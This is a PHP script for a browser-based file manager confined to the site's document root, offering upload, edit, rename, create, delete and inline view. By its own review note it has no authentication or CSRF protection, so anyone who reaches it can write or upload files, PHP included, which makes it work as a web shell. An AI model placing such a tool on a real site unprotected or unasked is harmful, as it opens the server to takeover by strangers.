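<?php
/**
 * Root-locked simple file manager.
 *
 * This version does not use JS for core actions.
 * Directory opening, edit, save, upload, delete and rename are checked server-side.
 *
 * Every client-supplied path is a base64 value; it is decoded, resolved with
 * realpath() and only accepted when it lies inside $ROOT_DIR (see isInsideRoot()).
 * Paths that do not exist yet (rename target, new file/folder, upload) go through
 * safeChildPath(), which reduces the name to a single path component.
 *
 * NOTE(review): the script performs no authentication and its POST forms carry no
 * CSRF token, so every handler below acts for any client that can reach this URL;
 * access has to be restricted in front of it (web server / hosting level).
 */

/**
 * If DOCUMENT_ROOT is wrong on your hosting, set the root manually:
 * $ROOT_DIR = '/home/USER/public_html';
 */
$ROOT_DIR = isset($_SERVER['DOCUMENT_ROOT']) && $_SERVER['DOCUMENT_ROOT'] !== ''
    ? realpath($_SERVER['DOCUMENT_ROOT'])
    : realpath(__DIR__);

if ($ROOT_DIR === false) {
    die('Root directory not found');
}

// Unconditionally declared functions are hoisted, so normalizePath() is usable here.
$ROOT_DIR = normalizePath($ROOT_DIR);

/**
 * Canonical slash form of a path: backslashes become '/', trailing slashes are dropped.
 * A root of '/' normalizes to '' (every path then passes isInsideRoot()).
 *
 * @param mixed $path
 * @return string
 */
function normalizePath($path)
{
    return rtrim(str_replace('\\', '/', (string) $path), '/');
}

/**
 * HTML-escape a value for text and attribute context.
 *
 * ENT_SUBSTITUTE makes invalid UTF-8 show up as U+FFFD instead of turning the whole
 * string into '' (which made the editor textarea of a non-UTF-8 file appear empty).
 *
 * @param mixed $value
 * @return string
 */
function h($value)
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Encode a path for transport in URLs and hidden form fields.
 *
 * @param mixed $value
 * @return string
 */
function b64($value)
{
    return base64_encode((string) $value);
}

/**
 * Decode a client-supplied base64 path value.
 *
 * Strict decoding rejects anything that is not clean base64; a decoded value that
 * is empty or contains a NUL byte is rejected too, since NUL is never valid in a
 * path and some filesystem functions raise on it instead of returning false.
 *
 * @param mixed $value raw request value
 * @return string|false decoded path, or false when the value is unusable
 */
function decodePathValue($value)
{
    if (!is_string($value) || $value === '') {
        return false;
    }
    $decoded = base64_decode($value, true);
    if ($decoded === false || $decoded === '' || strpos($decoded, "\0") !== false) {
        return false;
    }
    return $decoded;
}

/**
 * True when $path is $ROOT_DIR itself or lies below it.
 *
 * The trailing '/' is appended to both sides so that a sibling such as
 * "/var/wwwx" is not mistaken for a child of "/var/www".
 *
 * @param string $path
 * @return bool
 */
function isInsideRoot($path)
{
    global $ROOT_DIR;
    $path = normalizePath($path);
    return $path === $ROOT_DIR || strpos($path . '/', $ROOT_DIR . '/') === 0;
}

/**
 * Resolve an existing path (symlinks included) and accept it only inside the root.
 *
 * @param mixed $path
 * @return string|false normalized real path, or false
 */
function safeExistingPath($path)
{
    if (!is_string($path) || $path === '') {
        return false;
    }
    $real = realpath($path);
    if ($real === false) {
        return false;
    }
    $real = normalizePath($real);
    return isInsideRoot($real) ? $real : false;
}

/** @return string|false existing directory inside the root, or false */
function safeDir($path)
{
    $safe = safeExistingPath($path);
    return ($safe !== false && is_dir($safe)) ? $safe : false;
}

/** @return string|false existing regular file inside the root, or false */
function safeFile($path)
{
    $safe = safeExistingPath($path);
    return ($safe !== false && is_file($safe)) ? $safe : false;
}

/**
 * Build the path of a (possibly not yet existing) entry named $name inside $dir.
 *
 * $dir must be an existing directory inside the root; $name is reduced to its last
 * path component, so separators and '..' cannot move the result out of $dir.
 *
 * @param mixed $dir
 * @param mixed $name raw request value
 * @return string|false
 */
function safeChildPath($dir, $name)
{
    $safeDir = safeDir($dir);
    if ($safeDir === false || !is_string($name)) {
        return false;
    }
    $name = basename(str_replace('\\', '/', $name));
    if ($name === '' || $name === '.' || $name === '..') {
        return false;
    }
    $childPath = normalizePath($safeDir . '/' . $name);
    return isInsideRoot($childPath) ? $childPath : false;
}

/**
 * Directory selected by the request ('d' in POST, then GET), falling back to the root
 * when the value is missing, undecodable or not a directory inside the root.
 *
 * @return string
 */
function getRequestedDir()
{
    global $ROOT_DIR;
    $requestedDir = $ROOT_DIR;
    $raw = null;
    if (isset($_POST['d'])) {
        $raw = $_POST['d'];
    } elseif (isset($_GET['d'])) {
        $raw = $_GET['d'];
    }
    if ($raw !== null) {
        $decoded = decodePathValue($raw);
        if ($decoded !== false) {
            $requestedDir = $decoded;
        }
    }
    $safeDir = safeDir($requestedDir);
    return $safeDir !== false ? $safeDir : $ROOT_DIR;
}

/**
 * Script URL used as the base of every generated link and redirect.
 *
 * SCRIPT_NAME is preferred over PHP_SELF because PHP_SELF also carries any
 * client-supplied PATH_INFO ("/index.php/anything"), which would otherwise be
 * reflected into every link and Location header built here.
 *
 * @return string
 */
function selfUrl()
{
    if (isset($_SERVER['SCRIPT_NAME']) && $_SERVER['SCRIPT_NAME'] !== '') {
        return $_SERVER['SCRIPT_NAME'];
    }
    return isset($_SERVER['PHP_SELF']) ? $_SERVER['PHP_SELF'] : '';
}

/**
 * URL that opens $dir, with an optional flash message ('m').
 *
 * @param string $dir
 * @param string $message
 * @return string
 */
function dirUrl($dir, $message = '')
{
    $url = selfUrl() . '?d=' . rawurlencode(b64($dir));
    if ($message !== '') {
        $url .= '&m=' . rawurlencode($message);
    }
    return $url;
}

/**
 * Redirect to a directory listing and stop; an unusable $dir falls back to the root.
 *
 * @param string $dir
 * @param string $message
 * @return void
 */
function redirectToDir($dir, $message = '')
{
    global $ROOT_DIR;
    $safeDir = safeDir($dir);
    if ($safeDir === false) {
        $safeDir = $ROOT_DIR;
    }
    header('Location: ' . dirUrl($safeDir, $message));
    exit;
}

/**
 * File size as "x.xx MB" / "x.xx KB", or '--' when filesize() fails.
 *
 * @param string $path
 * @return string
 */
function humanFileSize($path)
{
    $bytes = filesize($path);
    if ($bytes === false) {
        return '--';
    }
    if ($bytes >= 1048576) {
        return round($bytes / 1048576, 2) . ' MB';
    }
    return round($bytes / 1024, 2) . ' KB';
}

/** @return string URL serving $file inline (see the 'view' handler below) */
function viewUrl($file)
{
    return selfUrl() . '?view=' . rawurlencode(b64($file));
}

/** @return string URL opening $file in the editor, with $dir as the listing to return to */
function editUrl($file, $dir)
{
    return selfUrl() . '?edit=' . rawurlencode(b64($file)) . '&d=' . rawurlencode(b64($dir));
}

$currentDir = getRequestedDir();
$dir = $currentDir; // Kept for compatibility with old code.

// View file as text / inline content.
if (isset($_GET['view'])) {
    $decoded = decodePathValue($_GET['view']);
    $filePath = $decoded !== false ? safeFile($decoded) : false;
    if ($filePath === false) {
        http_response_code(403);
        echo 'Access denied';
        exit;
    }

    $mime = function_exists('mime_content_type') ? mime_content_type($filePath) : 'application/octet-stream';
    if ($mime === false || $mime === '') {
        $mime = 'application/octet-stream';
    }

    // Quotes and line breaks are stripped so the file name cannot end the header value early.
    $headerName = str_replace(['"', "\r", "\n"], '', basename($filePath));
    $size = filesize($filePath);

    header('Content-Type: ' . $mime);
    // Files from the site root are served under this origin; do not let the browser re-guess the type.
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: inline; filename="' . $headerName . '"');
    if ($size !== false) {
        header('Content-Length: ' . $size);
    }
    readfile($filePath);
    exit;
}

// Delete file.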
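if (isset($_POST['del'])) {
    // Only regular files inside the root can be deleted; the redirect returns to the file's directory.
    $decoded = decodePathValue($_POST['del']);
    $filePath = $decoded !== false ? safeFile($decoded) : false;
    if ($filePath === false) {
        redirectToDir($currentDir, 'Access denied');
    }
    $fileDir = dirname($filePath);
    if (@unlink($filePath)) {
        redirectToDir($fileDir, 'Delete successful');
    }
    redirectToDir($fileDir, 'Delete failed');
}

// Save edited file.
if (isset($_POST['save'], $_POST['obj'], $_POST['content'])) {
    $decoded = decodePathValue($_POST['obj']);
    $filePath = $decoded !== false ? safeFile($decoded) : false;
    if ($filePath === false) {
        redirectToDir($currentDir, 'Access denied');
    }
    $fileDir = dirname($filePath);
    // content[]=... would make file_put_contents() write the imploded array; only a plain string is written.
    if (!is_string($_POST['content'])) {
        redirectToDir($fileDir, 'Save failed');
    }
    if (file_put_contents($filePath, $_POST['content']) !== false) {
        redirectToDir($fileDir, 'Saved');
    }
    redirectToDir($fileDir, 'Save failed');
}

// Rename file or folder.
if (isset($_POST['ren'], $_POST['new'])) {
    $decoded = decodePathValue($_POST['ren']);
    $oldPath = $decoded !== false ? safeExistingPath($decoded) : false;
    if ($oldPath === false) {
        redirectToDir($currentDir, 'Access denied');
    }
    $oldDir = dirname($oldPath);
    // The new name stays in the same directory: safeChildPath() strips separators and rejects '.'/'..'.
    // Renaming the root itself fails here too, because its parent lies outside the root.
    $newPath = safeChildPath($oldDir, $_POST['new']);
    if ($newPath === false) {
        redirectToDir($oldDir, 'Invalid new name');
    }
    if (file_exists($newPath)) {
        redirectToDir($oldDir, 'Rename failed - target already exists');
    }
    if (@rename($oldPath, $newPath)) {
        redirectToDir($oldDir, 'Renamed');
    }
    redirectToDir($oldDir, 'Rename failed');
}

// Create folder.
if (isset($_POST['create_dir'], $_POST['new_dir_name'])) {
    $newDirPath = safeChildPath($currentDir, $_POST['new_dir_name']);
    if ($newDirPath === false) {
        redirectToDir($currentDir, 'Invalid folder name');
    }
    if (file_exists($newDirPath)) {
        redirectToDir($currentDir, 'Folder already exists');
    }
    if (@mkdir($newDirPath, 0755)) {
        redirectToDir($currentDir, 'Folder created');
    }
    redirectToDir($currentDir, 'Create folder failed');
}

// Create file.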
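if (isset($_POST['create_file'], $_POST['new_file_name'])) {
    $newFilePath = safeChildPath($currentDir, $_POST['new_file_name']);
    if ($newFilePath === false) {
        redirectToDir($currentDir, 'Invalid file name');
    }
    if (file_exists($newFilePath)) {
        redirectToDir($currentDir, 'File already exists');
    }
    if (file_put_contents($newFilePath, '') !== false) {
        redirectToDir($currentDir, 'File created');
    }
    redirectToDir($currentDir, 'Create file failed');
}

// Upload file.
if (isset($_POST['s'], $_FILES['u'])) {
    // 'error' is an int for a single field; a multi-file field (u[]) makes it an array and fails here.
    if (!isset($_FILES['u']['error'])
        || $_FILES['u']['error'] !== UPLOAD_ERR_OK
        || !is_string($_FILES['u']['name'])
    ) {
        redirectToDir($currentDir, 'Upload failed');
    }
    // The client file name is reduced to its last component; safeChildPath() repeats this and checks the root.
    $fileName = basename($_FILES['u']['name']);
    $tmpName = $_FILES['u']['tmp_name'];
    $destination = safeChildPath($currentDir, $fileName);
    if ($destination === false) {
        redirectToDir($currentDir, 'Access denied');
    }
    if (!is_uploaded_file($tmpName)) {
        redirectToDir($currentDir, 'Invalid upload');
    }
    // Unlike create_file, an existing file of the same name is replaced by move_uploaded_file().
    if (@move_uploaded_file($tmpName, $destination)) {
        redirectToDir($currentDir, 'Upload successful');
    }
    redirectToDir($currentDir, 'Upload failed - cannot write file');
}

// Edit file screen.
$editFilePath = false;
$editContent = '';
if (isset($_GET['edit'])) {
    $decoded = decodePathValue($_GET['edit']);
    $editFilePath = $decoded !== false ? safeFile($decoded) : false;
    if ($editFilePath === false) {
        redirectToDir($currentDir, 'Access denied');
    }
    $currentDir = dirname($editFilePath);
    // Read once here so an unreadable file produces a message instead of an empty textarea
    // that would overwrite the file with nothing on Save.
    $editContent = file_get_contents($editFilePath);
    if ($editContent === false) {
        redirectToDir($currentDir, 'Unable to read file');
    }
}

// Flash message passed by redirectToDir(); an array value (m[]=) is ignored.
$message = isset($_GET['m']) && is_string($_GET['m']) ? trim($_GET['m']) : '';

/**
 * Inline rename form for one listing entry (used for both folders and files).
 *
 * @param string $fullPath real path of the entry
 * @param string $currentDir listing to return to
 * @param string $name current entry name, pre-filled as the new name
 * @return string HTML
 */
function renameFormHtml($fullPath, $currentDir, $name)
{
    return '<form class="inline-form" method="post">'
        . '<input type="hidden" name="ren" value="' . h(b64($fullPath)) . '">'
        . '<input type="hidden" name="d" value="' . h(b64($currentDir)) . '">'
        . '<input class="rename-input" type="text" name="new" value="' . h($name) . '">'
        . ' <button type="submit">Rename</button>'
        . '</form>';
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>File Explore</title>
<style>
body { margin: 0; padding: 20px; background: #f3f3f3; color: #222; font-family: Arial, sans-serif; font-size: 14px; }
a { color: #0645ad; text-decoration: none; }
a:hover { text-decoration: underline; }
.box, table { width: 92%; margin: 0 auto 16px; box-sizing: border-box; background: #fff; border: 1px solid #ccc; }
.box { padding: 12px; }
table { border-collapse: collapse; }
th, td { border: 1px solid #ccc; padding: 7px; text-align: left; vertical-align: middle; }
th { background: #e8e8e8; }
textarea { width: 100%; height: 430px; box-sizing: border-box; font-family: Consolas, Monaco, monospace; font-size: 13px; }
.message { background: #eef8ee; border-color: #9dcc9d; }
.muted { color: #777; font-size: 12px; }
.actions { white-space: nowrap; }
.inline-form { display: inline; margin: 0; padding: 0; }
.rename-input { width: 145px; }
button, input[type="submit"] { cursor: pointer; }
</style>
</head>
<body>
<?php if ($message !== ''): ?>
<div class="box message"><?php echo h($message); ?></div>
<?php endif; ?>
<div class="box">
<strong>Current directory:</strong>
<?php
// Breadcrumb: one link per path component below the root. At the root itself substr()
// yields '' (or false on older PHP), which trim() turns into ''.
echo '<a href="' . h(dirUrl($ROOT_DIR)) . '">[site root]</a>/';
$relativePath = trim((string) substr($currentDir, strlen($ROOT_DIR)), '/');
if ($relativePath !== '') {
    $buildPath = $ROOT_DIR;
    foreach (explode('/', $relativePath) as $part) {
        $buildPath .= '/' . $part;
        echo '<a href="' . h(dirUrl($buildPath)) . '">' . h($part) . '</a>/';
    }
}
?>
</div>
<?php if ($editFilePath !== false): ?>
<div class="box">
<p>
<a href="<?php echo h(dirUrl(dirname($editFilePath))); ?>">Back</a>
<span class="muted">Editing: <?php echo h(basename($editFilePath)); ?></span>
</p>
<form method="post">
<input type="hidden" name="obj" value="<?php echo h(b64($editFilePath)); ?>">
<input type="hidden" name="d" value="<?php echo h(b64(dirname($editFilePath))); ?>">
<?php // Only UTF-8 text survives the escape/submit round trip unchanged; other encodings are altered by h(). ?>
<textarea name="content"><?php echo h($editContent); ?></textarea>
<p style="text-align:center;">
<button type="submit" name="save" value="1">Save</button>
</p>
</form>
</div>
<?php else: ?>
<div class="box">
<form method="post" enctype="multipart/form-data" style="margin-bottom: 10px;">
<strong>Upload:</strong>
<input type="file" name="u">
<input type="submit" name="s" value="Upload">
<input type="hidden" name="d" value="<?php echo h(b64($currentDir)); ?>">
</form>
<form method="post" style="margin-bottom: 10px;">
<strong>Create folder:</strong>
<input type="text" name="new_dir_name" placeholder="folder-name">
<button type="submit" name="create_dir" value="1">Create folder</button>
<input type="hidden" name="d" value="<?php echo h(b64($currentDir)); ?>">
</form>
<form method="post">
<strong>Create file:</strong>
<input type="text" name="new_file_name" placeholder="file-name.txt">
<button type="submit" name="create_file" value="1">Create file</button>
<input type="hidden" name="d" value="<?php echo h(b64($currentDir)); ?>">
</form>
</div>
<?php
$items = scandir($currentDir);
if ($items === false) {
    echo '<div class="box">Unable to read directory!</div>';
} else {
    echo '<table>';
    echo '<tr><th>Name</th><th>Size</th><th>Action</th></tr>';
    foreach ($items as $item) {
        if ($item === '.' || $item === '..') {
            continue;
        }
        // Entries whose real path resolves outside the root (e.g. symlinks pointing out) are not listed.
        $fullPath = safeExistingPath($currentDir . '/' . $item);
        if ($fullPath === false) {
            continue;
        }
        echo '<tr>';
        if (is_dir($fullPath)) {
            echo '<td><a href="' . h(dirUrl($fullPath)) . '"><b>dir></b> ' . h($item) . '</a></td>';
            echo '<td>--</td>';
            echo '<td class="actions">' . renameFormHtml($fullPath, $currentDir, $item) . '</td>';
        } else {
            echo '<td>fil> ' . h($item) . '</td>';
            echo '<td>' . h(humanFileSize($fullPath)) . '</td>';
            echo '<td class="actions">';
            echo '<a href="' . h(viewUrl($fullPath)) . '" target="_blank" rel="noopener">Open</a> | ';
            echo '<a href="' . h(editUrl($fullPath, $currentDir)) . '">Edit</a> | ';
            echo '<form class="inline-form" method="post" onsubmit="return confirm(\'Delete this file?\');">';
            echo '<input type="hidden" name="del" value="' . h(b64($fullPath)) . '">';
            echo '<input type="hidden" name="d" value="' . h(b64($currentDir)) . '">';
            echo '<button type="submit">Delete</button>';
            echo '</form>';
            echo ' | ';
            echo renameFormHtml($fullPath, $currentDir, $item);
            echo '</td>';
        }
        echo '</tr>';
    }
    echo '</table>';
}
?>
<?php endif; ?>
</body>
</html>
<?php // Silence is golden.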